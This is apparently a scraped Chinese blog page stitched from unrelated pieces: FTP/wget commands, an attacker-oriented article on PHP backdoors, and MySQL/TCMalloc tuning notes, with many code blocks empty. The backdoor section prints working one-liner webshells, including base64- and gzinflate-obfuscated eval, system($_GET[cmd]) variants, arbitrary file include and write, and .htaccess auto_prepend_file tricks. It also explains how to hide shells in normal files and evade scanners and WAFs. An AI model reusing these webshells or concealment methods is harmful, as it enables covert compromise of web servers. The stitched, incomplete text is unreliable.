沧海一粟

环境：CentOS 5.0 操作系统
一.安装：
1.安装Vsftpd服务相关部件：

目标ftp服务器是一个非标准端口的ftp

1.通过shell登录
#ftp    //shell下输入ftp命令,进入到ftp提示符
>open IP  PORT   //IP ,PORT对应为服务器的IP和端口号
或者直接使用一条语句
#ftp  IP  PORT


2.多文件下载(对目录无效)
如:下载目录下的所有文件(子目录是无法下载下来的)
>mget *
这样操作,下载每个文件都会提问,每次都要输入一个y
要去掉提问,就要先输入
>prompt off


3.解决:ftp命令行不支持目录下载
通过wget得到解决
#wget ftp://IP:PORT/* --ftp-user=xxx --ftp-password=xxx -r
注:
星号*必须有,否则下载下来的就一个文件index.html
-r参数就是用来目录下载的

附:
一个ftp多文件下载上传的shell脚本
ftp server: 192.168.0.100:2121
User/PWD  :  test/ 2009
到OUTBOX下下载所有的文件(不包括文件夹),并将test.txt上传到INBOX
内容如下

根据关键词删除行,过滤筛选


根据关键词提取内容



监控脚本

php后门有很多，包子也见多了和玩多了，但是在一次帮助朋友检查服务器的时候，竟然发现这样的恶意代码。

事情是这样的，朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到，小黑的伎俩很高级，每次使用完毕总是把后门删掉，但是每次都能继续进来，总是找不到从哪进来的。这个着实让人蛋疼。

后来，终于在日志中发现一丝蛛丝马迹，通过我的分析，我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间后，此IP就访问一个莫名奇妙文件，名字很显眼明显不是正常系统文件，而是PHP后门。但是很快使用完毕后门就被删除了。

    我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马



404页面是网站常用的文件，一般建议好后很少有人会去对它进行检查修改，这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话


将$_POST['code']的内容赋值给$_SESSION['theCode']，然后执行$_SESSION['theCode']，亮点是没有特征码。用扫描工具来检查代码的话，是不会报警的，达到目的了。

超级隐蔽的PHP后门




执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。

层级请求，编码运行PHP后门

此方法用两个文件实现，文件1


文件2


通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果，一般waf对referer这些检测要松一点，或者没有检测。用这个思路bypass
waf不错。

PHP后门生成工具weevely

    weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web
页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。

    weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。

    以上是大概介绍下边是截图，相关使用方法亦家就不在这介绍了，简单的科普一下。


三个变形的一句话PHP木马

第一个：


在菜单里写 1.php?2=assert 密码是1。

第二个：


在菜刀里写2.php?_=assert&__=eval($_POST['pass'])
密码是pass。如果你用菜刀的附加数据的话更隐蔽，或者用其它注射工具也可以，因为是post提交的。

第三个：



str_rot13(‘riny’)即编码后的eval，完全避开了关键字，又不失效果，让人吐血！

如何应对PHP一句话后门

我们强调几个关键点，看这文章的你相信不是门外汉，我也就不啰嗦了：

1，对PHP程序编写要有安全意识。
2，服务器日志文件要经常看，经常备份。
3，对每个站点进行严格的权限分配。
4，对动态文件及目录经常批量安全审查。
5，学会如何进行手工杀毒《即行为判断查杀》。
6，时刻关注，或渗入活跃的网络安全营地。
7，对服务器环境层级化处理，哪怕一个函数也可做规则。

首先建立一PHP文件test.php 文件内容为:
　　
　　Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了， 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行返回的结果都可以看到。 　　

方法2现在的webshell是越来越流行了，连php的后门也追上来了，主要的有angel的phpspy和 lanker的一句话后门！所以现在最主要的是怎么隐蔽我们的后门，想必看完我的文章大家都有自己各自的想法了。其实lanker的一句话后门确实很强大，但是要用户使用客户端的话会带来一些不必要的麻烦，虽然可以使程序没有记录，（POST没记录的哦）但是对于一般的站点这其实并不是很重要。有没与想过把phpspy插到一个文件里去呢？没有想过吗？呵呵，跟我来，我们用记事本打开phspy就好了，搜索登录入口四个字。 在

现在你可以把这一个phpspy都写到对方的某个正常的php文件里，直接浏览是看不出问题的喔，我们要登录的时候就直接在文件名后面加上?name= wrsky才可以看到 当然你也可以改成别的，只要替代上面 代码里的name和wrsky就可以的，相信自己动手你会觉得收获很大的。如果你要自己改写一些简单的代码而你又不会php的话，这里就有样东西要介绍给你哦~php后门插入器，呵呵，你可以在http://www.wrsky.com 火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。 呵呵~红色的喔，粉PP吧~~我们来测试一下，我在这里提供一段 代码

这段 代码是执行cmd命令的，我们利用插入 工具 进行插入看看！ 没插入前的样子我的设置为参数名为name，参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了，你也可以写成 /home/imaboy/bk.php（因为这是 linux 系统） 显示写入文件成功，我们开始连接咱的木马，以为我用的参数的name，值是wrsky，所以连接方式为 木马 所在地址?name=wrsky 大家可以看到，在输入后面的参数后运行完全正常，而且不易被发现喔，很可能被带到另外一台主机上去喔 。 ，
呵呵，只要想一点，你们肯定还会有更好的办法的！

php后门木马常用的函数大致上可分为四种类型：
　　1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
　　2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
　　3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
　　4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
　　1. 执行系统命令:
　　system 函数
　　//test.php?cmd=ls
　　system($_GET[cmd]);
　　passthru 函数
　　//test.php?cmd=ls
　　passthru($_GET[cmd]);
　　shell_exec 函数
　　//test.php?cmd=ls
　　echo shell_exec($_GET[cmd]);
　　exec 函数
　　//test.php?cmd=ls
　　$arr = array();
　　exec($_GET[cmd],$arr);
　　print_r($arr);
　　popen 函数
　　//test.php?cmd=ls
　　$handle = popen('$_GET[cmd], 'r');
　　$read = fread($handle, 2096);
　　echo $read;
　　pclose($handle);
　　proc_open 函数
　　//test.php?cmd=ls
　　$descriptorspec = array(
　　0 => array('pipe', 'r'),
　　1 => array('pipe', 'w'),
　　2 => array('pipe', 'w'),
　　);
　　$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
　　fclose($pipes[0]);
　　$output = array();
　　while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
　　print_r($output);
　　2. 代码执行与加密:
　　eval 函数
　　//最常见的一句话木马
　　eval($_POST[cmd]);
　　base64_decode 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
　　gzinflate 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
　　gzuncompress 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
　　gzdecode 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
　　str_rot13 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST[cmd]);
　　eval(str_rot13('riny($_CBFG[pzq]);'));
　　assert 函数
　　//类似eval函数
　　assert($_POST[cmd]);
　　call_user_func 函数
　　//使用call_user_func调用assert
　　call_user_func('assert',$_POST[cmd]);
　　call_user_func 函数
　　//使用call_user_func调用任意函数
　　//test.php?a=assert&cmd=phpinfo()
　　call_user_func($_GET[a],$_REQUEST[cmd]);
　　组合代码
　　//组合方式调用任意函数
　　//test.php?a=assert&cmd=phpinfo()
　　$_GET[a]($_REQUEST[cmd]);
　　3. 文件包含与生成:
　　require 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　require($_GET[file]);
　　require_once 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　require_once($_GET[file]);
　　include 函数
　　//包含任意文件 www.jb51.net
　　//test.php?file=123.jpg
　　include($_GET[file]);
　　include_once 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　include_once($_GET[file]);
　　file_get_contents 函数
　　//读取任意文件
　　//test.php?f=config.inc.php
　　echo file_get_contents($_GET['f']);
　　file_put_contents 函数
　　//生成任意内容文件
　　//a=test.php&b=
　　file_put_contents($_GET[a],$_GET[b]);
　　fputs 函数
　　//生成任意内容文件
　　//a=test.php&b=
　　fputs(fopen($_GET[a],"w"),$_GET[b]);
　　4. .htaccess:
　　SetHandler
　　//可将php代码存于非php后缀文件,例: x.jpg
　　//将以下代码写入.htaccess中
　　//连接x.jpg即可启动后门木马出处www.admin8.us
　　
　　SetHandler application/x-httpd-php
　　
　　auto_prepend_file
　　//可将php代码存于非php后缀文件,例: 123.gif
　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径
　　//访问网站上任何php文件都会启动该php后门木马
　　//可在不更改站点源代码的情况下记录所有$_REQUEST的值，也可批量挂马
　　php_value auto_prepend_file c:/apache2/htdocs/123.gif
　　auto_append_file
　　//类似auto_prepend_file
　　//可将php代码存于非php后缀文件,例: 123.gif
　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径
　　//访问网站上任何php文件都会启动该php后门木马
　　php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法：通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 http://www.jb51.net/article/19292.htm

TCMalloc（Thread-Caching Malloc）是google开发的开源工具──“google-perftools”中的成员，地址：http://code.google.com/p/gperftools/。与标准的glibc库的malloc相比，TCMalloc在内存的分配上效率和速度要高得多，可以在很大程度上提高MySQL服务器在高并发情况下的性能，降低系统负载。
为MySQL添加TCMalloc库的安装步骤（Linux环境）：
1、64位操作系统请先安装libunwind库，32位操作系统不要安装。libunwind库为基于64位CPU和操作系统的程序提供了基本的堆栈辗转开解功能，其中包括用于输出堆栈跟踪的API、用于以编程方式辗转开解堆栈的API以及支持C++异常处理机制的API。



2、安装google-perftools：



3、修改MySQL启动脚本（根据你的MySQL安装位置而定）：



在# executing mysqld_safe的下一行，加上：


保存后退出，然后重启MySQL服务器。
4、使用lsof命令查看tcmalloc是否起效：


如果发现以下信息，说明tcmalloc已经起效：


如果看不到这些信息，表示perftools没有配置成功，可能是因为你编译mysql时使用了参数with-mysqld-ldflags=-all-static。

　　一、增加2G的swap交换文件
　　1、创建并激活swap交换文件



2、加到fstab文件中让系统引导时自动启动


在末尾增加以下内容：

修改全站搜索  
修改my.ini(my.cnf) ，在 [mysqld] 后面加入一行“ft_min_word_len=1”，然后 重启Mysql，再登录网站后台（模块管理->全站搜索）重建全文索引。  
记录慢查询sql语句，修改my.ini(my.cnf)，添加如下代码：  
#log-slow-queries  
long_query_time = 1 #是指 执行超过多久的 sql 会被 log 下来  
log-slow-queries = E:/wamp /logs/slow.log #设置把日志写在那里，可以为空，系统会给一个缺省的文件  
#log-slow-queries = /var /youpath/slow.log linux下     host_name-slow.log  
log-queries-not-using-indexes    
mysql缓存的设置  
mysql>show variables like '%query_cache%';     mysql 本身是有对sql语句缓存的机制的，合理设置我们的mysql缓存可以降低数据库的io资源。  
#query_cache_type= 查 询缓存的方式(默认是 ON)  
query_cache_size 如果你希望禁用查询缓存，设置 query_cache_size=0。禁用了查 询缓存，将没有明显的开销  
query_cache_limit 不缓存大于这个值的结果。(缺省为 1M)    
查询缓存的统计信息  
mysql> SHOW STATUS LIKE ‘qcache%’;  
Qcache_free_blocks 缓存中相邻内存块的个数。数目大说明可能有碎片。FLUSH QUERY CACHE 会对 缓存中的碎片进行整理，从而得到一个空闲块。  
Qcache_free_memory 缓存中的空闲内存。  
Qcache_hits 每次查询在缓存中命中时就增大。  
Qcache_inserts 每次插入一个查询时就增大。命中次数除以插入次数就是不中比率；用 1 减去这个值就是命中率。在上 面这个例子中，大约有 87% 的查询都在缓存中命中。  
Qcache_lowmem_prunes 缓存出现内存不足并且必须要进行清理以便为更多查询提供空间的次数。这个数字最好长时间 来看；如果这个数字在不断增长，就表示可能碎片非常严重，或者内存很少。（上面的 free_blocks 和 free_memory 可以告诉您属于 哪种情况）。  
Qcache_not_cached 不适合进行缓存的查询的数量，通常是由于这些查询不是 SELECT 语句。  
Qcache_queries_in_cache 当前缓存的查询（和响应）的数量。  
Qcache_total_blocks 缓存中块的数量。通常，间隔几秒显示这些变量就可以看出区别，这可以帮助确定缓存是否正在 有效地使用。运行 FLUSH STATUS 可以重置一些计数器，如果服务器已经运行了一段时间，这会非常有帮助。  
my.ini(my.conf)配置  
key_buffer_size = 256M  
# key_buffer_size指定用于索引的缓冲区大小，增加它可得到更好的索引处理性能。     对于内存在4GB左右的 服务器该参数可设置为256M或384M。注意：该参数值设置的过大反而会是服务器整体效率降低  
max_allowed_packet = 4M  
thread_stack = 256K  
table_cache = 128K  
sort_buffer_size = 6M  
查询排序时所能使用的缓冲区大小。注意：该参数对应的分配内存是每连接独占！如果有100个连接，那么实际分配的总共排序缓冲区大小 为100 × 6 ＝ 600MB。所以，对于内存在4GB左右的服务器推荐设置为6-8M。  
read_buffer_size = 4M  
读查询操作所能使用的缓冲区大小。和sort_buffer_size一样，该参数对应的分配内存也是每个连接独享！  
join_buffer_size = 8M  
联合查询操作所能使用的缓冲区大小，和sort_buffer_size一样，该参数对应的分配内存也是每个连接独享！    
myisam_sort_buffer_size = 64M  
table_cache = 512  
thread_cache_size = 64  
query_cache_size = 64M  
指定MySQL查询缓冲区的大小。可以通过在MySQL控制台执行以下命令观察：  
# > SHOW VARIABLES LIKE '%query_cache%';  
# > SHOW STATUS LIKE 'Qcache%';  
# 如果Qcache_lowmem_prunes的值非常大，则表明经常出现缓冲不够的情况；  
#如果Qcache_hits的值非常大，则表明查询缓冲使用非常频繁，如果该值较小反而会影响效率，那么可以考虑不用查询缓冲；  
Qcache_free_blocks，如 果该值非常大，则表明缓冲区中碎片很多  
tmp_table_size = 256M  
max_connections = 768  
指定MySQL允许的最大连接进程数。如果在访问论坛时经常出现Too Many Connections的错误提示，则需要增大该 参数值。  
max_connect_errors = 10000000  
wait_timeout = 10  
指定一个请求的最大连接时间，对于4GB左右内存的服务器可以设置为5-10。    
thread_concurrency = 8  
该参数取值为服务器逻辑CPU数量×2，如果服务器有2颗物理CPU，而每颗物理CPU又支持H.T超线程，所以实际取值为 4 × 2 ＝ 8    
skip-networking  
开启该选项可以彻底关闭MySQL的TCP/IP连接方式，如果WEB服务器是以远程连接的方式访问MySQL数据库服务器则不要开 启该选项！否则将无法正常连接！